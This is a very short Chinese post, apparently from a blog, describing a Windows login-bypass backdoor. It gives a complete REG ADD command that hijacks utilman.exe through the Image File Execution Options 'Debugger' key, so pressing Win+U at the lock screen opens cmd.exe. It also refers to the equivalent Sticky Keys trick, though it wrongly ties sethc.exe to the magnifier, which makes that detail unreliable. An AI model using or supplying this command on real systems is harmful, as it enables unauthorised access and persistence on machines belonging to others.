调用辅助工具管理器的快捷键: Win+U
通过注册表劫持实现后门,修改注册表的命令如下:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
利用辅助工具管理器后门(放大镜后门原理相同,进程为sethc.exe)绕过系统登录界面
最新推荐文章于 2023-02-19 16:42:21 发布